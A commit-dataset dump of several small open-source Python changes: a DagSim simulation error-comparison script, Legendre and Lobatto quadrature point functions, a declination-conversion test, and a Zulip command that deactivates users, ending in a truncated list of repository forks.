path = PurePath (directory)
pieces = path.parts
if len (pieces) >= 2:
experiment = pieces[-2]
query = pieces[-1]
return experiment, query
def process_simulations (filename):
results = defaultdict (dict)
with open (filename, newline = '') as csvfile:
reader = csv.DictReader (csvfile)
for row in reader:
query = row["Query"]
if query == row["Run"]:
experiment = row["Experiment"]
results[experiment][query] = float (row["SimAvg"])
return results
def process_summary (filename):
cumsum = 0.
count = 0
with open (filename, newline = '') as csvfile:
# Skip first line with application class
try:
next (csvfile)
except StopIteration:
pass
reader = csv.DictReader (csvfile)
for row in reader:
cumsum += float (row["applicationCompletionTime"]) - float (row["applicationDeltaBeforeComputing"])
count += 1
return cumsum / count
avg_R = defaultdict (dict)
for directory, _, files in os.walk (root):
for filename in files:
full_path = os.path.join (directory, filename)
if filename == "summary.csv":
experiment, query = parse_dir_name (directory)
result = process_summary (full_path)
avg_R[experiment][query] = result
elif filename == "simulations.csv":
sim_R = process_simulations (full_path)
errors = {experiment: {query: (sim_R[experiment][query] - real) / real
for query, real in inner.items ()}
for experiment, inner in avg_R.items ()}
fields = ["Experiment", "Query", "Error[1]"]
rows = ([experiment, query, error] for experiment, inner in errors.items ()
for query, error in inner.items())
writer = csv.writer (sys.stdout)
writer.writerow (fields)
writer.writerows (rows)
|
Add script to compare the error between real data and DagSim simulations
|
Add script to compare the error between real data and DagSim simulations
|
Python
|
apache-2.0
|
deib-polimi/Spark-Log-Parser,deib-polimi/Spark-Log-Parser
|
Add script to compare the error between real data and DagSim simulations
|
#!/usr/bin/env python3
## Copyright 2017 Eugenio Gianniti
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
import csv
import os
import sys
from collections import defaultdict
from pathlib import PurePath
if len (sys.argv) != 2:
print ("error: wrong number of input arguments", file = sys.stderr)
sys.exit (2)
else:
root = sys.argv[1]
def parse_dir_name (directory):
experiment = query = None
path = PurePath (directory)
pieces = path.parts
if len (pieces) >= 2:
experiment = pieces[-2]
query = pieces[-1]
return experiment, query
def process_simulations (filename):
results = defaultdict (dict)
with open (filename, newline = '') as csvfile:
reader = csv.DictReader (csvfile)
for row in reader:
query = row["Query"]
if query == row["Run"]:
experiment = row["Experiment"]
results[experiment][query] = float (row["SimAvg"])
return results
def process_summary (filename):
cumsum = 0.
count = 0
with open (filename, newline = '') as csvfile:
# Skip first line with application class
try:
next (csvfile)
except StopIteration:
pass
reader = csv.DictReader (csvfile)
for row in reader:
cumsum += float (row["applicationCompletionTime"]) - float (row["applicationDeltaBeforeComputing"])
count += 1
return cumsum / count
avg_R = defaultdict (dict)
for directory, _, files in os.walk (root):
for filename in files:
full_path = os.path.join (directory, filename)
if filename == "summary.csv":
experiment, query = parse_dir_name (directory)
result = process_summary (full_path)
avg_R[experiment][query] = result
elif filename == "simulations.csv":
sim_R = process_simulations (full_path)
errors = {experiment: {query: (sim_R[experiment][query] - real) / real
for query, real in inner.items ()}
for experiment, inner in avg_R.items ()}
fields = ["Experiment", "Query", "Error[1]"]
rows = ([experiment, query, error] for experiment, inner in errors.items ()
for query, error in inner.items())
writer = csv.writer (sys.stdout)
writer.writerow (fields)
writer.writerows (rows)
|
<commit_before><commit_msg>Add script to compare the error between real data and DagSim simulations<commit_after>
|
#!/usr/bin/env python3
## Copyright 2017 Eugenio Gianniti
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
import csv
import os
import sys
from collections import defaultdict
from pathlib import PurePath
if len (sys.argv) != 2:
print ("error: wrong number of input arguments", file = sys.stderr)
sys.exit (2)
else:
root = sys.argv[1]
def parse_dir_name (directory):
experiment = query = None
path = PurePath (directory)
pieces = path.parts
if len (pieces) >= 2:
experiment = pieces[-2]
query = pieces[-1]
return experiment, query
def process_simulations (filename):
results = defaultdict (dict)
with open (filename, newline = '') as csvfile:
reader = csv.DictReader (csvfile)
for row in reader:
query = row["Query"]
if query == row["Run"]:
experiment = row["Experiment"]
results[experiment][query] = float (row["SimAvg"])
return results
def process_summary (filename):
cumsum = 0.
count = 0
with open (filename, newline = '') as csvfile:
# Skip first line with application class
try:
next (csvfile)
except StopIteration:
pass
reader = csv.DictReader (csvfile)
for row in reader:
cumsum += float (row["applicationCompletionTime"]) - float (row["applicationDeltaBeforeComputing"])
count += 1
return cumsum / count
avg_R = defaultdict (dict)
for directory, _, files in os.walk (root):
for filename in files:
full_path = os.path.join (directory, filename)
if filename == "summary.csv":
experiment, query = parse_dir_name (directory)
result = process_summary (full_path)
avg_R[experiment][query] = result
elif filename == "simulations.csv":
sim_R = process_simulations (full_path)
errors = {experiment: {query: (sim_R[experiment][query] - real) / real
for query, real in inner.items ()}
for experiment, inner in avg_R.items ()}
fields = ["Experiment", "Query", "Error[1]"]
rows = ([experiment, query, error] for experiment, inner in errors.items ()
for query, error in inner.items())
writer = csv.writer (sys.stdout)
writer.writerow (fields)
writer.writerows (rows)
|
Add script to compare the error between real data and DagSim simulations#!/usr/bin/env python3
## Copyright 2017 Eugenio Gianniti
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
import csv
import os
import sys
from collections import defaultdict
from pathlib import PurePath
if len (sys.argv) != 2:
print ("error: wrong number of input arguments", file = sys.stderr)
sys.exit (2)
else:
root = sys.argv[1]
def parse_dir_name (directory):
experiment = query = None
path = PurePath (directory)
pieces = path.parts
if len (pieces) >= 2:
experiment = pieces[-2]
query = pieces[-1]
return experiment, query
def process_simulations (filename):
results = defaultdict (dict)
with open (filename, newline = '') as csvfile:
reader = csv.DictReader (csvfile)
for row in reader:
query = row["Query"]
if query == row["Run"]:
experiment = row["Experiment"]
results[experiment][query] = float (row["SimAvg"])
return results
def process_summary (filename):
cumsum = 0.
count = 0
with open (filename, newline = '') as csvfile:
# Skip first line with application class
try:
next (csvfile)
except StopIteration:
pass
reader = csv.DictReader (csvfile)
for row in reader:
cumsum += float (row["applicationCompletionTime"]) - float (row["applicationDeltaBeforeComputing"])
count += 1
return cumsum / count
avg_R = defaultdict (dict)
for directory, _, files in os.walk (root):
for filename in files:
full_path = os.path.join (directory, filename)
if filename == "summary.csv":
experiment, query = parse_dir_name (directory)
result = process_summary (full_path)
avg_R[experiment][query] = result
elif filename == "simulations.csv":
sim_R = process_simulations (full_path)
errors = {experiment: {query: (sim_R[experiment][query] - real) / real
for query, real in inner.items ()}
for experiment, inner in avg_R.items ()}
fields = ["Experiment", "Query", "Error[1]"]
rows = ([experiment, query, error] for experiment, inner in errors.items ()
for query, error in inner.items())
writer = csv.writer (sys.stdout)
writer.writerow (fields)
writer.writerows (rows)
|
<commit_before><commit_msg>Add script to compare the error between real data and DagSim simulations<commit_after>#!/usr/bin/env python3
## Copyright 2017 Eugenio Gianniti
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
import csv
import os
import sys
from collections import defaultdict
from pathlib import PurePath
if len (sys.argv) != 2:
print ("error: wrong number of input arguments", file = sys.stderr)
sys.exit (2)
else:
root = sys.argv[1]
def parse_dir_name (directory):
experiment = query = None
path = PurePath (directory)
pieces = path.parts
if len (pieces) >= 2:
experiment = pieces[-2]
query = pieces[-1]
return experiment, query
def process_simulations (filename):
results = defaultdict (dict)
with open (filename, newline = '') as csvfile:
reader = csv.DictReader (csvfile)
for row in reader:
query = row["Query"]
if query == row["Run"]:
experiment = row["Experiment"]
results[experiment][query] = float (row["SimAvg"])
return results
def process_summary (filename):
cumsum = 0.
count = 0
with open (filename, newline = '') as csvfile:
# Skip first line with application class
try:
next (csvfile)
except StopIteration:
pass
reader = csv.DictReader (csvfile)
for row in reader:
cumsum += float (row["applicationCompletionTime"]) - float (row["applicationDeltaBeforeComputing"])
count += 1
return cumsum / count
avg_R = defaultdict (dict)
for directory, _, files in os.walk (root):
for filename in files:
full_path = os.path.join (directory, filename)
if filename == "summary.csv":
experiment, query = parse_dir_name (directory)
result = process_summary (full_path)
avg_R[experiment][query] = result
elif filename == "simulations.csv":
sim_R = process_simulations (full_path)
errors = {experiment: {query: (sim_R[experiment][query] - real) / real
for query, real in inner.items ()}
for experiment, inner in avg_R.items ()}
fields = ["Experiment", "Query", "Error[1]"]
rows = ([experiment, query, error] for experiment, inner in errors.items ()
for query, error in inner.items())
writer = csv.writer (sys.stdout)
writer.writerow (fields)
writer.writerows (rows)
|
|
25606b72e55a4a79347830e7b33aa623fbdff08f
|
pyfr/polys.py
|
pyfr/polys.py
|
# -*- coding: utf-8 -*-
from sympy import Poly, legendre_poly, diff
from sympy.abc import x
from mpmath import polyroots
def gauss_legendre_points(n):
"""Returns the Gauss-Legendre quadrature points for order *n*
These are defined as the roots of P_n where P_n is the n'th
Legendre polynomial.
"""
coeffs = Poly(legendre_poly(n, x)).all_coeffs()
roots = polyroots([float(c) for c in coeffs])
return [float(r) for r in roots]
def lobatto_points(n):
"""Returns the Lobatto quadrature points for order *n*
These are defined as the roots of P'_(n-1) where P'_(n-1) is the
first derivative of the n'th - 1 Legendre polynomial plus the
points -1.0 and +1.0.
"""
coeffs = Poly(diff(legendre_poly(n-1, x), x)).all_coeffs()
roots = polyroots([float(c) for c in coeffs])
return [-1.0] + [float(r) for r in roots] + [1.0]
|
Add some polynomial-related functions. These will be useful later.
|
Add some polynomial-related functions. These will be useful later.
|
Python
|
bsd-3-clause
|
tjcorona/PyFR,iyer-arvind/PyFR,Aerojspark/PyFR,BrianVermeire/PyFR,tjcorona/PyFR,tjcorona/PyFR
|
Add some polynomial-related functions. These will be useful later.
|
# -*- coding: utf-8 -*-
from sympy import Poly, legendre_poly, diff
from sympy.abc import x
from mpmath import polyroots
def gauss_legendre_points(n):
"""Returns the Gauss-Legendre quadrature points for order *n*
These are defined as the roots of P_n where P_n is the n'th
Legendre polynomial.
"""
coeffs = Poly(legendre_poly(n, x)).all_coeffs()
roots = polyroots([float(c) for c in coeffs])
return [float(r) for r in roots]
def lobatto_points(n):
"""Returns the Lobatto quadrature points for order *n*
These are defined as the roots of P'_(n-1) where P'_(n-1) is the
first derivative of the n'th - 1 Legendre polynomial plus the
points -1.0 and +1.0.
"""
coeffs = Poly(diff(legendre_poly(n-1, x), x)).all_coeffs()
roots = polyroots([float(c) for c in coeffs])
return [-1.0] + [float(r) for r in roots] + [1.0]
|
<commit_before><commit_msg>Add some polynomial-related functions. These will be useful later.<commit_after>
|
# -*- coding: utf-8 -*-
from sympy import Poly, legendre_poly, diff
from sympy.abc import x
from mpmath import polyroots
def gauss_legendre_points(n):
"""Returns the Gauss-Legendre quadrature points for order *n*
These are defined as the roots of P_n where P_n is the n'th
Legendre polynomial.
"""
coeffs = Poly(legendre_poly(n, x)).all_coeffs()
roots = polyroots([float(c) for c in coeffs])
return [float(r) for r in roots]
def lobatto_points(n):
"""Returns the Lobatto quadrature points for order *n*
These are defined as the roots of P'_(n-1) where P'_(n-1) is the
first derivative of the n'th - 1 Legendre polynomial plus the
points -1.0 and +1.0.
"""
coeffs = Poly(diff(legendre_poly(n-1, x), x)).all_coeffs()
roots = polyroots([float(c) for c in coeffs])
return [-1.0] + [float(r) for r in roots] + [1.0]
|
Add some polynomial-related functions. These will be useful later.# -*- coding: utf-8 -*-
from sympy import Poly, legendre_poly, diff
from sympy.abc import x
from mpmath import polyroots
def gauss_legendre_points(n):
"""Returns the Gauss-Legendre quadrature points for order *n*
These are defined as the roots of P_n where P_n is the n'th
Legendre polynomial.
"""
coeffs = Poly(legendre_poly(n, x)).all_coeffs()
roots = polyroots([float(c) for c in coeffs])
return [float(r) for r in roots]
def lobatto_points(n):
"""Returns the Lobatto quadrature points for order *n*
These are defined as the roots of P'_(n-1) where P'_(n-1) is the
first derivative of the n'th - 1 Legendre polynomial plus the
points -1.0 and +1.0.
"""
coeffs = Poly(diff(legendre_poly(n-1, x), x)).all_coeffs()
roots = polyroots([float(c) for c in coeffs])
return [-1.0] + [float(r) for r in roots] + [1.0]
|
<commit_before><commit_msg>Add some polynomial-related functions. These will be useful later.<commit_after># -*- coding: utf-8 -*-
from sympy import Poly, legendre_poly, diff
from sympy.abc import x
from mpmath import polyroots
def gauss_legendre_points(n):
"""Returns the Gauss-Legendre quadrature points for order *n*
These are defined as the roots of P_n where P_n is the n'th
Legendre polynomial.
"""
coeffs = Poly(legendre_poly(n, x)).all_coeffs()
roots = polyroots([float(c) for c in coeffs])
return [float(r) for r in roots]
def lobatto_points(n):
"""Returns the Lobatto quadrature points for order *n*
These are defined as the roots of P'_(n-1) where P'_(n-1) is the
first derivative of the n'th - 1 Legendre polynomial plus the
points -1.0 and +1.0.
"""
coeffs = Poly(diff(legendre_poly(n-1, x), x)).all_coeffs()
roots = polyroots([float(c) for c in coeffs])
return [-1.0] + [float(r) for r in roots] + [1.0]
|
|
905b4cc269279ba444fe4114a64b6f9bf9663312
|
tests/test_visibility.py
|
tests/test_visibility.py
|
"""Test code for visibilty.py."""
import pytest
from visibility import decdeg2dms, StarObsPlot, VisibilityPlot
@pytest.mark.parametrize("test_input,expected", [
(0, (0, 0, 0)),
(33.33, (33, 19, 48)),
(-45.5125, (-45, 30, 45)),
(60.60, (60, 36, 0)),
(-90, (-90, 0, 0)),
])
def test_decdeg2dms(test_input, expected):
"""Test of converting decimal declination."""
# Possibly limit to +/-90 deg somewhere.
assert decdeg2dms(test_input) == expected
|
Add a test for decimal declination conversion.
|
Add a test for decimal declination conversion.
|
Python
|
mit
|
DanielAndreasen/ObservationTools,iastro-pt/ObservationTools
|
Add a test for decimal declination conversion.
|
"""Test code for visibilty.py."""
import pytest
from visibility import decdeg2dms, StarObsPlot, VisibilityPlot
@pytest.mark.parametrize("test_input,expected", [
(0, (0, 0, 0)),
(33.33, (33, 19, 48)),
(-45.5125, (-45, 30, 45)),
(60.60, (60, 36, 0)),
(-90, (-90, 0, 0)),
])
def test_decdeg2dms(test_input, expected):
"""Test of converting decimal declination."""
# Possibly limit to +/-90 deg somewhere.
assert decdeg2dms(test_input) == expected
|
<commit_before><commit_msg>Add a test for decimal declination conversion.<commit_after>
|
"""Test code for visibilty.py."""
import pytest
from visibility import decdeg2dms, StarObsPlot, VisibilityPlot
@pytest.mark.parametrize("test_input,expected", [
(0, (0, 0, 0)),
(33.33, (33, 19, 48)),
(-45.5125, (-45, 30, 45)),
(60.60, (60, 36, 0)),
(-90, (-90, 0, 0)),
])
def test_decdeg2dms(test_input, expected):
"""Test of converting decimal declination."""
# Possibly limit to +/-90 deg somewhere.
assert decdeg2dms(test_input) == expected
|
Add a test for decimal declination conversion."""Test code for visibilty.py."""
import pytest
from visibility import decdeg2dms, StarObsPlot, VisibilityPlot
@pytest.mark.parametrize("test_input,expected", [
(0, (0, 0, 0)),
(33.33, (33, 19, 48)),
(-45.5125, (-45, 30, 45)),
(60.60, (60, 36, 0)),
(-90, (-90, 0, 0)),
])
def test_decdeg2dms(test_input, expected):
"""Test of converting decimal declination."""
# Possibly limit to +/-90 deg somewhere.
assert decdeg2dms(test_input) == expected
|
<commit_before><commit_msg>Add a test for decimal declination conversion.<commit_after>"""Test code for visibilty.py."""
import pytest
from visibility import decdeg2dms, StarObsPlot, VisibilityPlot
@pytest.mark.parametrize("test_input,expected", [
(0, (0, 0, 0)),
(33.33, (33, 19, 48)),
(-45.5125, (-45, 30, 45)),
(60.60, (60, 36, 0)),
(-90, (-90, 0, 0)),
])
def test_decdeg2dms(test_input, expected):
"""Test of converting decimal declination."""
# Possibly limit to +/-90 deg somewhere.
assert decdeg2dms(test_input) == expected
|
|
7ee945062db49db7bab8a2f43a0ffebb9985ef7a
|
zephyr/management/commands/test_deactivate.py
|
zephyr/management/commands/test_deactivate.py
|
from optparse import make_option
from django.core.management.base import BaseCommand
from confirmation.models import Confirmation
from zephyr.models import User, MitUser
class Command(BaseCommand):
help = "Mark one or more users as inactive in the database."
def handle(self, *args, **options):
for email in args:
try:
user = User.objects.get(email=email)
if user.is_active:
user.is_active = False
user.save()
print email + ": Deactivated."
else:
print email + ": Already inactive."
except User.DoesNotExist:
print email + ": User does not exist in database"
|
Add command to mark users as inactive.
|
Add command to mark users as inactive.
This is useful when testing the sigup workflow, as this script enables you
to run through a MIT signup without manually creating a new inactive user
in the database.
(imported from commit c22649cc7c561c2fbe8682d1b17d7e5aba9ac04e)
|
Python
|
apache-2.0
|
luyifan/zulip,jonesgithub/zulip,vakila/zulip,SmartPeople/zulip,ahmadassaf/zulip,he15his/zulip,arpitpanwar/zulip,mahim97/zulip,hengqujushi/zulip,ashwinirudrappa/zulip,zacps/zulip,proliming/zulip,arpitpanwar/zulip,saitodisse/zulip,saitodisse/zulip,seapasulli/zulip,mohsenSy/zulip,themass/zulip,Cheppers/zulip,peguin40/zulip,wangdeshui/zulip,grave-w-grave/zulip,noroot/zulip,SmartPeople/zulip,dnmfarrell/zulip,jeffcao/zulip,he15his/zulip,dxq-git/zulip,joyhchen/zulip,dawran6/zulip,tdr130/zulip,xuanhan863/zulip,developerfm/zulip,saitodisse/zulip,isht3/zulip,hayderimran7/zulip,dnmfarrell/zulip,KJin99/zulip,yuvipanda/zulip,EasonYi/zulip,noroot/zulip,kokoar/zulip,eastlhu/zulip,he15his/zulip,synicalsyntax/zulip,aps-sids/zulip,Qgap/zulip,deer-hope/zulip,Juanvulcano/zulip,jessedhillon/zulip,KingxBanana/zulip,MariaFaBella85/zulip,eeshangarg/zulip,easyfmxu/zulip,jimmy54/zulip,amyliu345/zulip,sharmaeklavya2/zulip,jerryge/zulip,bssrdf/zulip,jessedhillon/zulip,codeKonami/zulip,gigawhitlocks/zulip,paxapy/zulip,rht/zulip,brainwane/zulip,LAndreas/zulip,Galexrt/zulip,proliming/zulip,lfranchi/zulip,amallia/zulip,aakash-cr7/zulip,reyha/zulip,bluesea/zulip,ahmadassaf/zulip,fw1121/zulip,reyha/zulip,saitodisse/zulip,kaiyuanheshang/zulip,yocome/zulip,jimmy54/zulip,ashwinirudrappa/zulip,Gabriel0402/zulip,amanharitsh123/zulip,eeshangarg/zulip,umkay/zulip,so0k/zulip,amallia/zulip,nicholasbs/zulip,Vallher/zulip,vikas-parashar/zulip,jphilipsen05/zulip,aliceriot/zulip,zofuthan/zulip,MariaFaBella85/zulip,brockwhittaker/zulip,KJin99/zulip,zulip/zulip,peguin40/zulip,jrowan/zulip,esander91/zulip,tdr130/zulip,huangkebo/zulip,ryansnowboarder/zulip,Frouk/zulip,lfranchi/zulip,atomic-labs/zulip,alliejones/zulip,Drooids/zulip,johnnygaddarr/zulip,moria/zulip,shrikrishnaholla/zulip,shrikrishnaholla/zulip,johnny9/zulip,jainayush975/zulip,KingxBanana/zulip,Suninus/zulip,timabbott/zulip,so0k/zulip,esander91/zulip,cosmicAsymmetry/zulip,guiquanz/zulip,seapasulli/zulip,mdavid/zulip,dhcrzf/zulip,proliming/zulip,zhaoweigg/zulip,zulip/zulip,bowlofstew/zulip,dwrpayne/zulip,Drooids/zulip,jainayush975/zulip,ryanbackman/zulip,PhilSk/zulip,JPJPJPOPOP/zulip,atomic-labs/zulip,m1ssou/zulip,Galexrt/zulip,hengqujushi/zulip,joshisa/zulip,praveenaki/zulip,levixie/zulip,bluesea/zulip,Vallher/zulip,jrowan/zulip,wavelets/zulip,proliming/zulip,isht3/zulip,thomasboyt/zulip,Frouk/zulip,shrikrishnaholla/zulip,synicalsyntax/zulip,reyha/zulip,esander91/zulip,blaze225/zulip,eeshangarg/zulip,so0k/zulip,bssrdf/zulip,firstblade/zulip,zofuthan/zulip,AZtheAsian/zulip,moria/zulip,so0k/zulip,schatt/zulip,kaiyuanheshang/zulip,SmartPeople/zulip,fw1121/zulip,praveenaki/zulip,ikasumiwt/zulip,j831/zulip,bssrdf/zulip,alliejones/zulip,KJin99/zulip,tdr130/zulip,LeeRisk/zulip,ufosky-server/zulip,arpitpanwar/zulip,RobotCaleb/zulip,amallia/zulip,swinghu/zulip,tbutter/zulip,zulip/zulip,EasonYi/zulip,themass/zulip,ahmadassaf/zulip,joshisa/zulip,LeeRisk/zulip,seapasulli/zulip,luyifan/zulip,xuxiao/zulip,krtkmj/zulip,bssrdf/zulip,dnmfarrell/zulip,rishig/zulip,tiansiyuan/zulip,zachallaun/zulip,ericzhou2008/zulip,fw1121/zulip,amallia/zulip,ApsOps/zulip,Cheppers/zulip,amyliu345/zulip,esander91/zulip,punchagan/zulip,sharmaeklavya2/zulip,natanovia/zulip,natanovia/zulip,PhilSk/zulip,LeeRisk/zulip,tommyip/zulip,Cheppers/zulip,DazWorrall/zulip,joshisa/zulip,arpith/zulip,bastianh/zulip,ahmadassaf/zulip,ericzhou2008/zulip,babbage/zulip,Cheppers/zulip,rishig/zulip,lfranchi/zulip,niftynei/zulip,swinghu/zulip,zwily/zulip,jrowan/zulip,hj3938/zulip,wdaher/zulip,voidException/zulip,wweiradio/zulip,paxapy/zulip,ashwinirudrappa/zulip,jonesgithub/zulip,developerfm/zulip,zhaoweigg/zulip,luyifan/zulip,vakila/zulip,wangdeshui/zulip,johnny9/zulip,showell/zulip,kou/zulip,ryansnowboarder/zulip,zacps/zulip,kokoar/zulip,eastlhu/zulip,stamhe/zulip,littledogboy/zulip,brainwane/zulip,qq1012803704/zulip,easyfmxu/zulip,themass/zulip,LeeRisk/zulip,willingc/zulip,technicalpickles/zulip,nicholasbs/zulip,huangkebo/zulip,PaulPetring/zulip,vakila/zulip,amyliu345/zulip,willingc/zulip,Suninus/zulip,bitemyapp/zulip,pradiptad/zulip,jonesgithub/zulip,qq1012803704/zulip,yocome/zulip,shaunstanislaus/zulip,blaze225/zulip,natanovia/zulip,johnnygaddarr/zulip,bowlofstew/zulip,eeshangarg/zulip,mdavid/zulip,mohsenSy/zulip,PhilSk/zulip,Frouk/zulip,Drooids/zulip,shrikrishnaholla/zulip,zulip/zulip,udxxabp/zulip,gkotian/zulip,xuanhan863/zulip,DazWorrall/zulip,Suninus/zulip,calvinleenyc/zulip,karamcnair/zulip,PaulPetring/zulip,hayderimran7/zulip,JPJPJPOPOP/zulip,praveenaki/zulip,aps-sids/zulip,zorojean/zulip,codeKonami/zulip,huangkebo/zulip,voidException/zulip,arpitpanwar/zulip,aps-sids/zulip,KJin99/zulip,JanzTam/zulip,showell/zulip,zachallaun/zulip,udxxabp/zulip,jimmy54/zulip,eastlhu/zulip,luyifan/zulip,jimmy54/zulip,sup95/zulip,akuseru/zulip,littledogboy/zulip,sup95/zulip,KJin99/zulip,fw1121/zulip,Gabriel0402/zulip,j831/zulip,qq1012803704/zulip,yocome/zulip,so0k/zulip,wavelets/zulip,souravbadami/zulip,ashwinirudrappa/zulip,Vallher/zulip,dxq-git/zulip,hafeez3000/zulip,vabs22/zulip,verma-varsha/zulip,wangdeshui/zulip,qq1012803704/zulip,wweiradio/zulip,gkotian/zulip,johnny9/zulip,amyliu345/zulip,rht/zulip,Suninus/zulip,lfranchi/zulip,andersk/zulip,bluesea/zulip,willingc/zulip,JanzTam/zulip,zachallaun/zulip,kaiyuanheshang/zulip,qq1012803704/zulip,hengqujushi/zulip,wdaher/zulip,littledogboy/zulip,ufosky-server/zulip,Qgap/zulip,itnihao/zulip,gkotian/zulip,thomasboyt/zulip,tiansiyuan/zulip,levixie/zulip,hackerkid/zulip,noroot/zulip,pradiptad/zulip,rht/zulip,akuseru/zulip,MayB/zulip,bitemyapp/zulip,krtkmj/zulip,ryansnowboarder/zulip,gkotian/zulip,easyfmxu/zulip,TigorC/zulip,easyfmxu/zulip,wangdeshui/zulip,bluesea/zulip,johnny9/zulip,swinghu/zulip,punchagan/zulip,Galexrt/zulip,jeffcao/zulip,xuxiao/zulip,willingc/zulip,hayderimran7/zulip,tdr130/zulip,tiansiyuan/zulip,LAndreas/zulip,stamhe/zulip,PaulPetring/zulip,nicholasbs/zulip,gigawhitlocks/zulip,brockwhittaker/zulip,souravbadami/zulip,timabbott/zulip,nicholasbs/zulip,kokoar/zulip,littledogboy/zulip,Diptanshu8/zulip,joshisa/zulip,johnnygaddarr/zulip,Qgap/zulip,dattatreya303/zulip,tommyip/zulip,zachallaun/zulip,PhilSk/zulip,zwily/zulip,xuanhan863/zulip,jphilipsen05/zulip,jimmy54/zulip,calvinleenyc/zulip,easyfmxu/zulip,lfranchi/zulip,joyhchen/zulip,souravbadami/zulip,shubhamdhama/zulip,showell/zulip,ahmadassaf/zulip,bssrdf/zulip,technicalpickles/zulip,LeeRisk/zulip,KingxBanana/zulip,wdaher/zulip,hj3938/zulip,Frouk/zulip,swinghu/zulip,zorojean/zulip,pradiptad/zulip,jessedhillon/zulip,mansilladev/zulip,mansilladev/zulip,TigorC/zulip,wdaher/zulip,ryansnowboarder/zulip,Diptanshu8/zulip,joyhchen/zulip,andersk/zulip,synicalsyntax/zulip,peiwei/zulip,luyifan/zulip,suxinde2009/zulip,udxxabp/zulip,technicalpickles/zulip,jonesgithub/zulip,swinghu/zulip,zulip/zulip,hafeez3000/zulip,so0k/zulip,dwrpayne/zulip,stamhe/zulip,codeKonami/zulip,avastu/zulip,cosmicAsymmetry/zulip,jessedhillon/zulip,vikas-parashar/zulip,fw1121/zulip,alliejones/zulip,susansls/zulip,wangdeshui/zulip,Galexrt/zulip,peiwei/zulip,seapasulli/zulip,mahim97/zulip,natanovia/zulip,technicalpickles/zulip,Galexrt/zulip,samatdav/zulip,Drooids/zulip,jessedhillon/zulip,saitodisse/zulip,johnnygaddarr/zulip,Batterfii/zulip,zofuthan/zulip,joshisa/zulip,hayderimran7/zulip,grave-w-grave/zulip,kaiyuanheshang/zulip,hackerkid/zulip,itnihao/zulip,armooo/zulip,themass/zulip,dotcool/zulip,rishig/zulip,mdavid/zulip,showell/zulip,samatdav/zulip,kokoar/zulip,he15his/zulip,isht3/zulip,ipernet/zulip,karamcnair/zulip,wweiradio/zulip,christi3k/zulip,Gabriel0402/zulip,amallia/zulip,aakash-cr7/zulip,PaulPetring/zulip,brainwane/zulip,AZtheAsian/zulip,bastianh/zulip,brainwane/zulip,timabbott/zulip,so0k/zulip,JanzTam/zulip,armooo/zulip,karamcnair/zulip,fw1121/zulip,kou/zulip,ryanbackman/zulip,ipernet/zulip,yuvipanda/zulip,mahim97/zulip,levixie/zulip,souravbadami/zulip,JPJPJPOPOP/zulip,jackrzhang/zulip,adnanh/zulip,zacps/zulip,eastlhu/zulip,dhcrzf/zulip,RobotCaleb/zulip,amallia/zulip,j831/zulip,EasonYi/zulip,glovebx/zulip,Suninus/zulip,kokoar/zulip,dhcrzf/zulip,guiquanz/zulip,technicalpickles/zulip,gkotian/zulip,timabbott/zulip,wavelets/zulip,andersk/zulip,arpith/zulip,glovebx/zulip,ericzhou2008/zulip,esander91/zulip,PaulPetring/zulip,bastianh/zulip,wangdeshui/zulip,umkay/zulip,armooo/zulip,xuanhan863/zulip,zorojean/zulip,itnihao/zulip,mdavid/zulip,LAndreas/zulip,zachallaun/zulip,moria/zulip,aliceriot/zulip,willingc/zulip,RobotCaleb/zulip,vikas-parashar/zulip,zwily/zulip,jeffcao/zulip,JPJPJPOPOP/zulip,ufosky-server/zulip,timabbott/zulip,Frouk/zulip,guiquanz/zulip,Juanvulcano/zulip,jackrzhang/zulip,tbutter/zulip,hj3938/zulip,jackrzhang/zulip,dattatreya303/zulip,peguin40/zulip,noroot/zulip,wavelets/zulip,ericzhou2008/zulip,rishig/zulip,bowlofstew/zulip,DazWorrall/zulip,mohsenSy/zulip,proliming/zulip,wavelets/zulip,ikasumiwt/zulip,atomic-labs/zulip,Juanvulcano/zulip,vabs22/zulip,ipernet/zulip,amyliu345/zulip,avastu/zulip,bowlofstew/zulip,developerfm/zulip,firstblade/zulip,deer-hope/zulip,he15his/zulip,blaze225/zulip,LeeRisk/zulip,eeshangarg/zulip,jphilipsen05/zulip,zulip/zulip,ryanbackman/zulip,jrowan/zulip,ryanbackman/zulip,swinghu/zulip,hafeez3000/zulip,KingxBanana/zulip,EasonYi/zulip,RobotCaleb/zulip,krtkmj/zulip,themass/zulip,brockwhittaker/zulip,huangkebo/zulip,adnanh/zulip,bitemyapp/zulip,mohsenSy/zulip,deer-hope/zulip,MariaFaBella85/zulip,ApsOps/zulip,timabbott/zulip,littledogboy/zulip,shubhamdhama/zulip,voidException/zulip,ApsOps/zulip,zwily/zulip,yuvipanda/zulip,jackrzhang/zulip,ahmadassaf/zulip,hustlzp/zulip,rht/zulip,hustlzp/zulip,developerfm/zulip,noroot/zulip,stamhe/zulip,themass/zulip,Vallher/zulip,ikasumiwt/zulip,schatt/zulip,hackerkid/zulip,eeshangarg/zulip,dwrpayne/zulip,paxapy/zulip,susansls/zulip,TigorC/zulip,reyha/zulip,firstblade/zulip,technicalp